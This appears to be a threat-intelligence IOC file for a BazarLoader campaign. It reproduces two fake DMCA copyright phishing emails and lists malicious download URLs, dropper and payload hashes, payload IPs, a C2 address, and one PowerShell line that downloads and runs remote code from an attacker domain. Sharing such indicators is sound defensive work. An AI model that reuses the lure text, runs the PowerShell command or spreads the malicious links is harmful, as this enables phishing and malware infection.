-
Notifications
You must be signed in to change notification settings - Fork 83
/
2021-09-03 BazarLoader IOCs
111 lines (92 loc) · 5.4 KB
/
2021-09-03 BazarLoader IOCs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
THREAT IDENTIFICATION: BAZARLOADER
SUBJECTS OBSERVED
<domain redacted> - Contact us
Contact Submission
EMAIL ADDRESSES IN EMAIL BODY
Gerreropix192@hotmail.com
Holmesshot868@gmail.com
EMAIL BODY
First Email:
Name: Craig Gerrero
Title: Attention: http://www.<redacted>.com Digital Millennium Copyright Act (DMCA)
Copyright Violation Notification
Organization: Craig Gerrero photography
Organization Type: Provider
Email: Gerreropix192@hotmail.com
Phone: 19178876525
Comments: Hi there!My name is Craig.Your website or a website that your
organization hosts is violating the copyright-protected images owned by me
personally.Check out this report with the hyperlinks to my images you used
at http://www.<redacted>.com and my previous publications to find the evidence of my
copyrights.Download it now and check this out for
yourself:https://urldefense.com/v3/__https://firebasestorage.googleapis.com/v0/b/app9-96feb.appspot.com/o/d-ewk39rgjj.html?alt=media&token=199118ba-056e-4115-b376-c3df54957323&l=779029658566515583__;!!LqLi6nfLPheP!dzw9VkIOsjA512V6R5CvwKmo-QOt3Jai-p6NiDwWmQGqSb8o2dUlS2sWr_7Y$
In my opinion you have deliberately violated my rights under 17 U.S.C.
Section 101 et seq. and could possibly be liable for statutory damage of up
to $140,000 as set-forth in Sec. 504 (c)(2) of the Digital millennium
copyright act (DMCA) therein.This message is official notice. I seek the
removal of the infringing materials mentioned above. Please take note as a
company, the Dmca requires you, to eliminate and/or disable access to the
copyrighted materials upon receipt of this notice. If you do not stop the
use of the aforementioned infringing materials a court action will be
initiated against you.I have a strong self-belief that utilization of the
copyrighted materials described above as allegedly infringing is not
approved by the copyright proprietor, its agent, or the legislation.I swear,
under consequence of perjury, that the information in this message is
correct and that I am currently the legal copyright owner or am certified to
act on behalf of the owner of an exclusive and legal right that is
presumably infringed.Sincerely,Craig Gerrero09/03/2021
Second Email:
name: Carolyn
email: Holmesshot868@gmail.com
message: Hi there! My name is Carolyn. Your website or a website that
your company hosts is violating the copyright-protected images owned
by myself. Take a look at this report with the URLs to my images you
used at www.<redacted>.com and my previous publication to get the proof of
my copyrights. Download it right now and check this out for yourself:
https://firebasestorage.googleapis.com/v0/b/app9-96feb.appspot.com/o/d-dfj3bgvbfj49j.html?alt=media&token=4ad9f6f7-9853-46fe-9558-e7cccf2273be&data=504853615710049199
I believe you have willfully infringed my rights under 17 U.S.C.
Section 101 et seq. and could be liable for statutory damages of up to
$150,000 as set-forth in Sec. 504(c)(2) of the Digital millennium
copyright act (”DMCA”) therein. This message is official notice. I
demand the elimination of the infringing materials described above.
Take note as a company, the Digital Millennium Copyright Act requires
you, to remove or/and deactivate access to the copyrighted content
upon receipt of this letter. In case you don't stop the use of the
aforementioned copyrighted materials a court action can be initiated
against you. I have a strong self-belief that utilization of the
copyrighted materials described above as allegedly violating is not
authorized by the legal copyright proprietor, its agent, as well as
law. I declare, under consequence of perjury, that the information in
this notification is correct and that I am the copyright proprietor or
am certified to act on behalf of the proprietor of an exclusive right
that is allegedly violated. Sincerely, Carolyn Holmes 09/03/2021
MALDOC DOWNLOAD URLS
https://firebasestorage.googleapis.com/v0/b/app9-96feb.appspot.com/o/d-ewk39rgjj.html?alt=media&token=199118ba-056e-4115-b376-c3df54957323&l=779029658566515583
https://firebasestorage.googleapis.com/v0/b/app9-96feb.appspot.com/o/d-dfj3bgvbfj49j.html?alt=media&token=4ad9f6f7-9853-46fe-9558-e7cccf2273be&data=504853615710049199
https://zvanij.space/stat740893/
https://doc-0o-4s-docs.googleusercontent.com/docs/securesc/gnlhlnb8qdns2ascer457j15mvcqerbm/2fanaidumht957i2strkq8iq03gu2ulo/1630690125000/02739528562752194537/17154290304884295172Z/1L0PNjr_Gad2U_5Z9Xd-aXEV_aFsxe2A_?e=download&nonce=fq1ekude8hv5i&user=17154290304884295172Z&hash=4tpedt6ulud8cvvnh2ulu4qa7g37j149
https://doc-0g-7c-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/l4hmg4n1sljpjprqf4llngajemo0ros1/1630690050000/02739528562752194537/*/1BeMQIso1ExLSlO-FwkG6ERbyXGIWt2YL?e=download
MALDOC FILE HASHES
Stolen Images Evidence.zip
4262f918371ed4d5ea549353150dd320
Stolen Images Evidence(1).zip
d264f165d1ee316a545136e78651e956
Which contains:
Stolen Images Evidence.js
ded36d93b97e7626cf478fce5f78c0de
Stolen Images Evidence.js
ec9fb3642db8bca6831057cbee2ecb99
POWERSHELL COMMANDS FROM THE JAVASCRIPT FILES
IEX (New-Object Net.Webclient).downloadstring("http://monosilk.space/034g100/index.php")
BAZARLOADER PAYLOAD DOWNLOAD URLS
http://104.21.37.205/034g100/index.php
http://104.21.37.205/034g100/main.php
http://172.67.212.231/034g100/index.php
http://172.67.212.231/034g100/main.php
BAZARLOADER PAYLOAD FILE HASHES
hWLFObl.dat
b6b5b4837718a095af7beebeaa7580bf
QLFvO.dat
0e38d7b585845609a126d454b5692040
BAZARLOADER C2
https://164.90.198.57/dir/child/issue